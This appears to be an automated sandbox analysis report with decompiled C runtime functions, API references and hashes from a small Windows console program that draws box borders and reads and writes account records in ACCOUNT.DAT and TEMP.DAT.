                                                                      • Opcode Fuzzy Hash: e59f81bd4fba2a734a36d5be8ed6afa0306c709c66ab92e753f4ea962bba7ff8
                                                                      • Instruction Fuzzy Hash: 8891D8719047958FDB14CFA9C8846ADBBF8FF05324B2442AED4A6A73D1DB34A803CB55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00BE8E23(void* __eflags, signed int _a4) {
                                                                      				void* _t12;
                                                                      				signed int _t13;
                                                                      				signed int _t16;
                                                                      				intOrPtr _t18;
                                                                      				void* _t22;
                                                                      				signed int _t35;
                                                                      				long _t40;
                                                                      
                                                                      				_t13 = E00BEA5A7(_t12);
                                                                      				if(_t13 >= 0) {
                                                                      					_t35 = _a4;
                                                                      					if(E00BF0132(_t35) == 0xffffffff) {
                                                                      						L10:
                                                                      						_t40 = 0;
                                                                      					} else {
                                                                      						_t18 =  *0xc02f60; // 0x0
                                                                      						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
                                                                      							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
                                                                      								goto L8;
                                                                      							} else {
                                                                      								goto L7;
                                                                      							}
                                                                      						} else {
                                                                      							L7:
                                                                      							_t22 = E00BF0132(2);
                                                                      							if(E00BF0132(1) == _t22) {
                                                                      								goto L10;
                                                                      							} else {
                                                                      								L8:
                                                                      								if(CloseHandle(E00BF0132(_t35)) != 0) {
                                                                      									goto L10;
                                                                      								} else {
                                                                      									_t40 = GetLastError();
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					E00BF00AC(_t35);
                                                                      					 *((char*)( *((intOrPtr*)(0xc02f60 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
                                                                      					if(_t40 == 0) {
                                                                      						_t16 = 0;
                                                                      					} else {
                                                                      						_t16 = E00BE8EDE(_t40) | 0xffffffff;
                                                                      					}
                                                                      					return _t16;
                                                                      				} else {
                                                                      					return _t13 | 0xffffffff;
                                                                      				}
                                                                      			}










                                                                      0x00be8e26
                                                                      0x00be8e2d
                                                                      0x00be8e36
                                                                      0x00be8e43
                                                                      0x00be8e95
                                                                      0x00be8e95
                                                                      0x00be8e45
                                                                      0x00be8e45
                                                                      0x00be8e4d
                                                                      0x00be8e5b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be8e63
                                                                      0x00be8e63
                                                                      0x00be8e65
                                                                      0x00be8e77
                                                                      0x00000000
                                                                      0x00be8e79
                                                                      0x00be8e79
                                                                      0x00be8e89
                                                                      0x00000000
                                                                      0x00be8e8b
                                                                      0x00be8e91
                                                                      0x00be8e91
                                                                      0x00be8e89
                                                                      0x00be8e77
                                                                      0x00be8e4d
                                                                      0x00be8e98
                                                                      0x00be8eb0
                                                                      0x00be8eb7
                                                                      0x00be8ec5
                                                                      0x00be8eb9
                                                                      0x00be8ec0
                                                                      0x00be8ec0
                                                                      0x00be8eca
                                                                      0x00be8e2f
                                                                      0x00be8e33
                                                                      0x00be8e33

                                                                      APIs
                                                                      • __ioinit.LIBCMT ref: 00BE8E26
                                                                        • Part of subcall function 00BEA5A7: InitOnceExecuteOnce.KERNEL32(00C0229C,00BEA5E2,00000000,00000000,00BF1205,?,?,00BE9886,00000000,?,?,?,00BE71AD,-00000020,00BFD7B8,0000000C), ref: 00BEA5B5
                                                                      • __get_osfhandle.LIBCMT ref: 00BE8E3A
                                                                      • __get_osfhandle.LIBCMT ref: 00BE8E65
                                                                      • __get_osfhandle.LIBCMT ref: 00BE8E6E
                                                                      • __get_osfhandle.LIBCMT ref: 00BE8E7A
                                                                      • CloseHandle.KERNEL32(00000000,00BE2656,00000000,?,00BF41AB,00BE2656,?,?,?,?,?,?,?,00BE2656,00000000,00000109), ref: 00BE8E81
                                                                      • GetLastError.KERNEL32(?,00BF41AB,00BE2656,?,?,?,?,?,?,?,00BE2656,00000000,00000109), ref: 00BE8E8B
                                                                      • __free_osfhnd.LIBCMT ref: 00BE8E98
                                                                      • __dosmaperr.LIBCMT ref: 00BE8EBA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                                                                      • String ID:
                                                                      • API String ID: 974577687-0
                                                                      • Opcode ID: 7b7fe33199f5356c6d46e233265c01de3e0f48e708b17e2c6903a32ccc292704
                                                                      • Instruction ID: b722d1dfb01ea64a9c2b2a08afe0825bfdcc038b7a933b880c2ef912f65f9c4f
                                                                      • Opcode Fuzzy Hash: 7b7fe33199f5356c6d46e233265c01de3e0f48e708b17e2c6903a32ccc292704
                                                                      • Instruction Fuzzy Hash: 8B112532601AE419C220337AA84973E77CA9F41774F2502C9FA1CDB1E2EF6498458290
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BE6EF1: __fsopen.LIBCMT ref: 00BE6EFC
                                                                      • _swscanf.LIBCMT ref: 00BE3B48
                                                                        • Part of subcall function 00BE7021: _vfscanf.LIBCMT ref: 00BE7035
                                                                      • _fprintf.LIBCMT ref: 00BE3DA6
                                                                      Strings
                                                                      • TEMP.DAT, xrefs: 00BE3AE2
                                                                      • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 00BE3B3D
                                                                      • ACCOUNT.DAT, xrefs: 00BE3ABE
                                                                      • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 00BE3D9A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: __fsopen_fprintf_swscanf_vfscanf
                                                                      • String ID: %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$ACCOUNT.DAT$TEMP.DAT
                                                                      • API String ID: 1563022539-2055742014
                                                                      • Opcode ID: c828d23baf53e87c5c06df59f8e44d34ef8d3fc1fd4e47b17bbc542223cbc110
                                                                      • Instruction ID: f187d1b4cd012d05092426f1e91849781d3544c014d6e632d6f8cf6489a54e0c
                                                                      • Opcode Fuzzy Hash: c828d23baf53e87c5c06df59f8e44d34ef8d3fc1fd4e47b17bbc542223cbc110
                                                                      • Instruction Fuzzy Hash: DB910572C105599ECB09CFB8D995BEEFBB9EF45300F1482AEE106BA181EB345685CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 76%
                                                                      			E00BE1380(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                      				intOrPtr _v8;
                                                                      				intOrPtr _v12;
                                                                      				void* __ebp;
                                                                      				intOrPtr _t61;
                                                                      				intOrPtr _t67;
                                                                      				void* _t75;
                                                                      				intOrPtr _t87;
                                                                      				void* _t103;
                                                                      				void* _t104;
                                                                      				void* _t105;
                                                                      				void* _t106;
                                                                      
                                                                      				_t102 = __esi;
                                                                      				_t101 = __edi;
                                                                      				E00BE12B0(_a4, _a8);
                                                                      				_push(0xc9);
                                                                      				_push("%c");
                                                                      				E00BE715C(_t75, __edi, __esi, __eflags);
                                                                      				_t104 = _t103 + 8;
                                                                      				_v8 = _a4 + 1;
                                                                      				while(1) {
                                                                      					_t109 = _v8 - _a12 - 1;
                                                                      					if(_v8 >= _a12 - 1) {
                                                                      						break;
                                                                      					}
                                                                      					E00BE12B0(_v8, _a8);
                                                                      					_push(0xcd);
                                                                      					_push("%c");
                                                                      					E00BE715C(_t75, _t101, _t102, _t109);
                                                                      					_t104 = _t104 + 8;
                                                                      					_v8 = _v8 + 1;
                                                                      				}
                                                                      				E00BE12B0(_v8, _a8);
                                                                      				_push(0xbb);
                                                                      				_push("%c");
                                                                      				E00BE715C(_t75, _t101, _t102, __eflags);
                                                                      				_t105 = _t104 + 8;
                                                                      				_v12 = _a8 + 1;
                                                                      				while(1) {
                                                                      					__eflags = _v12 - _a16;
                                                                      					if(__eflags >= 0) {
                                                                      						break;
                                                                      					}
                                                                      					E00BE12B0(_a4, _v12);
                                                                      					_v8 = _a4;
                                                                      					while(1) {
                                                                      						__eflags = _v8 - _a12;
                                                                      						if(_v8 >= _a12) {
                                                                      							break;
                                                                      						}
                                                                      						__eflags = _v8 - _a4;
                                                                      						if(__eflags == 0) {
                                                                      							L12:
                                                                      							E00BE12B0(_v8, _v12);
                                                                      							_push(0xba);
                                                                      							_push("%c");
                                                                      							E00BE715C(_t75, _t101, _t102, __eflags);
                                                                      							_t105 = _t105 + 8;
                                                                      						} else {
                                                                      							__eflags = _v8 - _a12 - 1;
                                                                      							if(__eflags == 0) {
                                                                      								goto L12;
                                                                      							}
                                                                      						}
                                                                      						_t67 = _v8 + 1;
                                                                      						__eflags = _t67;
                                                                      						_v8 = _t67;
                                                                      					}
                                                                      					_t87 = _v12 + 1;
                                                                      					__eflags = _t87;
                                                                      					_v12 = _t87;
                                                                      				}
                                                                      				E00BE12B0(_a4, _v12);
                                                                      				_push(0xc8);
                                                                      				_push("%c");
                                                                      				E00BE715C(_t75, _t101, _t102, __eflags);
                                                                      				_t106 = _t105 + 8;
                                                                      				_v8 = _a4 + 1;
                                                                      				while(1) {
                                                                      					__eflags = _v8 - _a12 - 1;
                                                                      					if(__eflags >= 0) {
                                                                      						break;
                                                                      					}
                                                                      					E00BE12B0(_v8, _v12);
                                                                      					_push(0xcd);
                                                                      					_push("%c");
                                                                      					E00BE715C(_t75, _t101, _t102, __eflags);
                                                                      					_t106 = _t106 + 8;
                                                                      					_t61 = _v8 + 1;
                                                                      					__eflags = _t61;
                                                                      					_v8 = _t61;
                                                                      				}
                                                                      				E00BE12B0(_v8, _v12);
                                                                      				_push(0xbc);
                                                                      				_push("%c");
                                                                      				return E00BE715C(_t75, _t101, _t102, __eflags);
                                                                      			}














                                                                      0x00be1380
                                                                      0x00be1380
                                                                      0x00be138e
                                                                      0x00be1393
                                                                      0x00be1398
                                                                      0x00be139d
                                                                      0x00be13a2
                                                                      0x00be13ab
                                                                      0x00be13b9
                                                                      0x00be13bf
                                                                      0x00be13c2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be13cc
                                                                      0x00be13d1
                                                                      0x00be13d6
                                                                      0x00be13db
                                                                      0x00be13e0
                                                                      0x00be13b6
                                                                      0x00be13b6
                                                                      0x00be13ed
                                                                      0x00be13f2
                                                                      0x00be13f7
                                                                      0x00be13fc
                                                                      0x00be1401
                                                                      0x00be140a
                                                                      0x00be1418
                                                                      0x00be141b
                                                                      0x00be141e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be1428
                                                                      0x00be1430
                                                                      0x00be143e
                                                                      0x00be1441
                                                                      0x00be1444
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be1449
                                                                      0x00be144c
                                                                      0x00be1459
                                                                      0x00be1461
                                                                      0x00be1466
                                                                      0x00be146b
                                                                      0x00be1470
                                                                      0x00be1475
                                                                      0x00be144e
                                                                      0x00be1454
                                                                      0x00be1457
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be1457
                                                                      0x00be1438
                                                                      0x00be1438
                                                                      0x00be143b
                                                                      0x00be143b
                                                                      0x00be1412
                                                                      0x00be1412
                                                                      0x00be1415
                                                                      0x00be1415
                                                                      0x00be1484
                                                                      0x00be1489
                                                                      0x00be148e
                                                                      0x00be1493
                                                                      0x00be1498
                                                                      0x00be14a1
                                                                      0x00be14af
                                                                      0x00be14b5
                                                                      0x00be14b8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be14c2
                                                                      0x00be14c7
                                                                      0x00be14cc
                                                                      0x00be14d1
                                                                      0x00be14d6
                                                                      0x00be14a9
                                                                      0x00be14a9
                                                                      0x00be14ac
                                                                      0x00be14ac
                                                                      0x00be14e3
                                                                      0x00be14e8
                                                                      0x00be14ed
                                                                      0x00be14fd

                                                                      APIs
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE139D
                                                                      • _wprintf.LIBCMT ref: 00BE13DB
                                                                        • Part of subcall function 00BE715C: __stbuf.LIBCMT ref: 00BE71A8
                                                                        • Part of subcall function 00BE715C: __output_s_l.LIBCMT ref: 00BE71C2
                                                                        • Part of subcall function 00BE715C: __ftbuf.LIBCMT ref: 00BE71D6
                                                                      • _wprintf.LIBCMT ref: 00BE13FC
                                                                      • _wprintf.LIBCMT ref: 00BE1470
                                                                      • _wprintf.LIBCMT ref: 00BE1493
                                                                      • _wprintf.LIBCMT ref: 00BE14D1
                                                                      • _wprintf.LIBCMT ref: 00BE14F2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                                                      • String ID:
                                                                      • API String ID: 1778593935-0
                                                                      • Opcode ID: e22859e9d21d48492caa265b40bc43cc9c8926e211036c7efb74cf7bd0972b72
                                                                      • Instruction ID: a5d70ce5c2ec77793fad69c2a54478842e7e33fa121825fc27523347729162a6
                                                                      • Opcode Fuzzy Hash: e22859e9d21d48492caa265b40bc43cc9c8926e211036c7efb74cf7bd0972b72
                                                                      • Instruction Fuzzy Hash: 0D415E71A11249FBCB14EF99CD82EAE77F5AF45300F3086D8FA05AB381D730AA449B55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E00BED6D2(void* __ebx, void* __edi) {
                                                                      				void* __esi;
                                                                      				void* _t3;
                                                                      				intOrPtr _t6;
                                                                      				long _t14;
                                                                      				long* _t27;
                                                                      
                                                                      				E00BE75FE(_t3);
                                                                      				if(E00BEBF8E() != 0) {
                                                                      					_t6 = E00BEBFD8(_t5, E00BED468);
                                                                      					 *0xc01a40 = _t6;
                                                                      					__eflags = _t6 - 0xffffffff;
                                                                      					if(_t6 == 0xffffffff) {
                                                                      						goto L1;
                                                                      					} else {
                                                                      						_t27 = E00BEC55B(1, 0x3b8);
                                                                      						__eflags = _t27;
                                                                      						if(_t27 == 0) {
                                                                      							L6:
                                                                      							E00BED748();
                                                                      							__eflags = 0;
                                                                      							return 0;
                                                                      						} else {
                                                                      							__eflags = E00BEC002(_t9,  *0xc01a40, _t27);
                                                                      							if(__eflags == 0) {
                                                                      								goto L6;
                                                                      							} else {
                                                                      								_push(0);
                                                                      								_push(_t27);
                                                                      								E00BED626(__ebx, __edi, _t27, __eflags);
                                                                      								_t14 = GetCurrentThreadId();
                                                                      								_t27[1] = _t27[1] | 0xffffffff;
                                                                      								 *_t27 = _t14;
                                                                      								__eflags = 1;
                                                                      								return 1;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					L1:
                                                                      					E00BED748();
                                                                      					return 0;
                                                                      				}
                                                                      			}








                                                                      0x00bed6d2
                                                                      0x00bed6de
                                                                      0x00bed6ed
                                                                      0x00bed6f3
                                                                      0x00bed6f8
                                                                      0x00bed6fb
                                                                      0x00000000
                                                                      0x00bed6fd
                                                                      0x00bed70a
                                                                      0x00bed70e
                                                                      0x00bed710
                                                                      0x00bed73f
                                                                      0x00bed73f
                                                                      0x00bed744
                                                                      0x00bed747
                                                                      0x00bed712
                                                                      0x00bed720
                                                                      0x00bed722
                                                                      0x00000000
                                                                      0x00bed724
                                                                      0x00bed724
                                                                      0x00bed726
                                                                      0x00bed727
                                                                      0x00bed72e
                                                                      0x00bed734
                                                                      0x00bed738
                                                                      0x00bed73c
                                                                      0x00bed73e
                                                                      0x00bed73e
                                                                      0x00bed722
                                                                      0x00bed710
                                                                      0x00bed6e0
                                                                      0x00bed6e0
                                                                      0x00bed6e0
                                                                      0x00bed6e7
                                                                      0x00bed6e7

                                                                      APIs
                                                                      • __init_pointers.LIBCMT ref: 00BED6D2
                                                                        • Part of subcall function 00BE75FE: EncodePointer.KERNEL32(00000000,?,00BED6D7,00BE892B,00BFD838,00000014), ref: 00BE7601
                                                                        • Part of subcall function 00BE75FE: __initp_misc_winsig.LIBCMT ref: 00BE7622
                                                                      • __mtinitlocks.LIBCMT ref: 00BED6D7
                                                                        • Part of subcall function 00BEBF8E: InitializeCriticalSectionAndSpinCount.KERNEL32(00C013D0,00000FA0,?,?,00BED6DC,00BE892B,00BFD838,00000014), ref: 00BEBFAC
                                                                      • __mtterm.LIBCMT ref: 00BED6E0
                                                                      • __calloc_crt.LIBCMT ref: 00BED705
                                                                      • __initptd.LIBCMT ref: 00BED727
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00BED72E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                                      • String ID:
                                                                      • API String ID: 2211675822-0
                                                                      • Opcode ID: d102cf6a58f41e56d965c498cfb5fc2c2131df7bcde18397ec0d30ff1012719b
                                                                      • Instruction ID: fda291febfd88f68ca6b82b9080efc254e86c93bbd7ce1ce57d16e912b5f182c
                                                                      • Opcode Fuzzy Hash: d102cf6a58f41e56d965c498cfb5fc2c2131df7bcde18397ec0d30ff1012719b
                                                                      • Instruction Fuzzy Hash: 13F0F03220A3D12AE7243B3B7C0375A36D4CB403B0B200699F825CA0D1EFB088418194
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 88%
                                                                      			E00BEBB6C(void* __eflags, signed char _a4, signed int* _a8) {
                                                                      				signed int _v8;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				void* _t43;
                                                                      				signed int _t44;
                                                                      				signed int _t45;
                                                                      				signed int _t48;
                                                                      				signed int _t52;
                                                                      				void* _t60;
                                                                      				signed int _t62;
                                                                      				void* _t64;
                                                                      				signed int _t67;
                                                                      				signed int _t70;
                                                                      				signed int _t74;
                                                                      				signed int _t76;
                                                                      				void* _t77;
                                                                      				signed int _t85;
                                                                      				void* _t86;
                                                                      				signed int _t87;
                                                                      				signed int _t89;
                                                                      				signed int* _t92;
                                                                      
                                                                      				_t44 = E00BEA5A7(_t43);
                                                                      				if(_t44 >= 0) {
                                                                      					_t92 = _a8;
                                                                      					_t45 = E00BE8BB2(_t92);
                                                                      					_t74 = _t92[3];
                                                                      					_t89 = _t45;
                                                                      					__eflags = _t74 & 0x00000082;
                                                                      					if(__eflags != 0) {
                                                                      						__eflags = _t74 & 0x00000040;
                                                                      						if(__eflags == 0) {
                                                                      							_t70 = 0;
                                                                      							__eflags = _t74 & 0x00000001;
                                                                      							if((_t74 & 0x00000001) == 0) {
                                                                      								L10:
                                                                      								_t48 = _t92[3] & 0xffffffef | 0x00000002;
                                                                      								_t92[3] = _t48;
                                                                      								_t92[1] = _t70;
                                                                      								__eflags = _t48 & 0x0000010c;
                                                                      								if((_t48 & 0x0000010c) == 0) {
                                                                      									_t60 = E00BE8C70();
                                                                      									__eflags = _t92 - _t60 + 0x20;
                                                                      									if(_t92 == _t60 + 0x20) {
                                                                      										L13:
                                                                      										_t62 = E00BF11E7(_t89);
                                                                      										__eflags = _t62;
                                                                      										if(_t62 == 0) {
                                                                      											goto L14;
                                                                      										}
                                                                      									} else {
                                                                      										_t64 = E00BE8C70();
                                                                      										__eflags = _t92 - _t64 + 0x40;
                                                                      										if(_t92 != _t64 + 0x40) {
                                                                      											L14:
                                                                      											E00BF192E(_t92);
                                                                      										} else {
                                                                      											goto L13;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								__eflags = _t92[3] & 0x00000108;
                                                                      								if((_t92[3] & 0x00000108) == 0) {
                                                                      									__eflags = 1;
                                                                      									_push(1);
                                                                      									_v8 = 1;
                                                                      									_push( &_a4);
                                                                      									_push(_t89);
                                                                      									_t45 = E00BF0343(_t70, _t86, _t89, _t92, 1);
                                                                      									_t70 = _t45;
                                                                      									goto L27;
                                                                      								} else {
                                                                      									_t87 = _t92[2];
                                                                      									_t25 = _t87 + 1; // 0x1a06
                                                                      									 *_t92 = _t25;
                                                                      									_t76 =  *_t92 - _t87;
                                                                      									_v8 = _t76;
                                                                      									_t92[1] = _t92[6] - 1;
                                                                      									__eflags = _t76;
                                                                      									if(__eflags <= 0) {
                                                                      										__eflags = _t89 - 0xffffffff;
                                                                      										if(_t89 == 0xffffffff) {
                                                                      											L22:
                                                                      											_t77 = 0xc01390;
                                                                      										} else {
                                                                      											__eflags = _t89 - 0xfffffffe;
                                                                      											if(_t89 == 0xfffffffe) {
                                                                      												goto L22;
                                                                      											} else {
                                                                      												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0xc02f60 + (_t89 >> 5) * 4));
                                                                      											}
                                                                      										}
                                                                      										__eflags =  *(_t77 + 4) & 0x00000020;
                                                                      										if(__eflags == 0) {
                                                                      											goto L25;
                                                                      										} else {
                                                                      											_push(2);
                                                                      											_push(_t70);
                                                                      											_push(_t70);
                                                                      											_push(_t89);
                                                                      											_t45 = E00BF17B4(_t70, _t89, _t92, __eflags) & _t87;
                                                                      											__eflags = _t45 - 0xffffffff;
                                                                      											if(_t45 == 0xffffffff) {
                                                                      												goto L28;
                                                                      											} else {
                                                                      												goto L25;
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										_push(_t76);
                                                                      										_push(_t87);
                                                                      										_push(_t89);
                                                                      										_t70 = E00BF0343(_t70, _t87, _t89, _t92, __eflags);
                                                                      										L25:
                                                                      										_t45 = _a4;
                                                                      										 *(_t92[2]) = _t45;
                                                                      										L27:
                                                                      										__eflags = _t70 - _v8;
                                                                      										if(_t70 == _v8) {
                                                                      											_t52 = _a4 & 0x000000ff;
                                                                      										} else {
                                                                      											L28:
                                                                      											_t40 =  &(_t92[3]);
                                                                      											 *_t40 = _t92[3] | 0x00000020;
                                                                      											__eflags =  *_t40;
                                                                      											goto L29;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							} else {
                                                                      								_t92[1] = 0;
                                                                      								__eflags = _t74 & 0x00000010;
                                                                      								if((_t74 & 0x00000010) == 0) {
                                                                      									_t92[3] = _t74 | 0x00000020;
                                                                      									L29:
                                                                      									_t52 = _t45 | 0xffffffff;
                                                                      								} else {
                                                                      									_t85 = _t74 & 0xfffffffe;
                                                                      									__eflags = _t85;
                                                                      									 *_t92 = _t92[2];
                                                                      									_t92[3] = _t85;
                                                                      									goto L10;
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t67 = E00BE8EFF(__eflags);
                                                                      							 *_t67 = 0x22;
                                                                      							goto L6;
                                                                      						}
                                                                      					} else {
                                                                      						_t67 = E00BE8EFF(__eflags);
                                                                      						 *_t67 = 9;
                                                                      						L6:
                                                                      						_t92[3] = _t92[3] | 0x00000020;
                                                                      						_t52 = _t67 | 0xffffffff;
                                                                      					}
                                                                      					return _t52;
                                                                      				} else {
                                                                      					return _t44 | 0xffffffff;
                                                                      				}
                                                                      			}


























                                                                      0x00bebb70
                                                                      0x00bebb77
                                                                      0x00bebb7f
                                                                      0x00bebb84
                                                                      0x00bebb8a
                                                                      0x00bebb8d
                                                                      0x00bebb8f
                                                                      0x00bebb92
                                                                      0x00bebba1
                                                                      0x00bebba4
                                                                      0x00bebbbe
                                                                      0x00bebbc0
                                                                      0x00bebbc3
                                                                      0x00bebbd8
                                                                      0x00bebbde
                                                                      0x00bebbe1
                                                                      0x00bebbe4
                                                                      0x00bebbe7
                                                                      0x00bebbec
                                                                      0x00bebbee
                                                                      0x00bebbf6
                                                                      0x00bebbf8
                                                                      0x00bebc06
                                                                      0x00bebc07
                                                                      0x00bebc0d
                                                                      0x00bebc0f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bebbfa
                                                                      0x00bebbfa
                                                                      0x00bebc02
                                                                      0x00bebc04
                                                                      0x00bebc11
                                                                      0x00bebc12
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bebc04
                                                                      0x00bebbf8
                                                                      0x00bebc18
                                                                      0x00bebc1f
                                                                      0x00bebc9d
                                                                      0x00bebc9e
                                                                      0x00bebc9f
                                                                      0x00bebca5
                                                                      0x00bebca6
                                                                      0x00bebca7
                                                                      0x00bebcaf
                                                                      0x00000000
                                                                      0x00bebc21
                                                                      0x00bebc21
                                                                      0x00bebc26
                                                                      0x00bebc29
                                                                      0x00bebc2e
                                                                      0x00bebc31
                                                                      0x00bebc34
                                                                      0x00bebc37
                                                                      0x00bebc39
                                                                      0x00bebc52
                                                                      0x00bebc55
                                                                      0x00bebc72
                                                                      0x00bebc72
                                                                      0x00bebc57
                                                                      0x00bebc57
                                                                      0x00bebc5a
                                                                      0x00000000
                                                                      0x00bebc5c
                                                                      0x00bebc69
                                                                      0x00bebc69
                                                                      0x00bebc5a
                                                                      0x00bebc77
                                                                      0x00bebc7b
                                                                      0x00000000
                                                                      0x00bebc7d
                                                                      0x00bebc7d
                                                                      0x00bebc7f
                                                                      0x00bebc80
                                                                      0x00bebc81
                                                                      0x00bebc87
                                                                      0x00bebc8c
                                                                      0x00bebc8f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00bebc8f
                                                                      0x00bebc3b
                                                                      0x00bebc3b
                                                                      0x00bebc3c
                                                                      0x00bebc3d
                                                                      0x00bebc46
                                                                      0x00bebc91
                                                                      0x00bebc94
                                                                      0x00bebc97
                                                                      0x00bebcb1
                                                                      0x00bebcb1
                                                                      0x00bebcb4
                                                                      0x00bebcbf
                                                                      0x00bebcb6
                                                                      0x00bebcb6
                                                                      0x00bebcb6
                                                                      0x00bebcb6
                                                                      0x00bebcb6
                                                                      0x00000000
                                                                      0x00bebcb6
                                                                      0x00bebcb4
                                                                      0x00bebc39
                                                                      0x00bebbc5
                                                                      0x00bebbc5
                                                                      0x00bebbc8
                                                                      0x00bebbcb
                                                                      0x00bebc4d
                                                                      0x00bebcba
                                                                      0x00bebcba
                                                                      0x00bebbcd
                                                                      0x00bebbd0
                                                                      0x00bebbd0
                                                                      0x00bebbd3
                                                                      0x00bebbd5
                                                                      0x00000000
                                                                      0x00bebbd5
                                                                      0x00bebbcb
                                                                      0x00bebba6
                                                                      0x00bebba6
                                                                      0x00bebbab
                                                                      0x00000000
                                                                      0x00bebbab
                                                                      0x00bebb94
                                                                      0x00bebb94
                                                                      0x00bebb99
                                                                      0x00bebbb1
                                                                      0x00bebbb1
                                                                      0x00bebbb5
                                                                      0x00bebbb5
                                                                      0x00bebcc7
                                                                      0x00bebb79
                                                                      0x00bebb7d
                                                                      0x00bebb7d

                                                                      APIs
                                                                      • __ioinit.LIBCMT ref: 00BEBB70
                                                                        • Part of subcall function 00BEA5A7: InitOnceExecuteOnce.KERNEL32(00C0229C,00BEA5E2,00000000,00000000,00BF1205,?,?,00BE9886,00000000,?,?,?,00BE71AD,-00000020,00BFD7B8,0000000C), ref: 00BEA5B5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
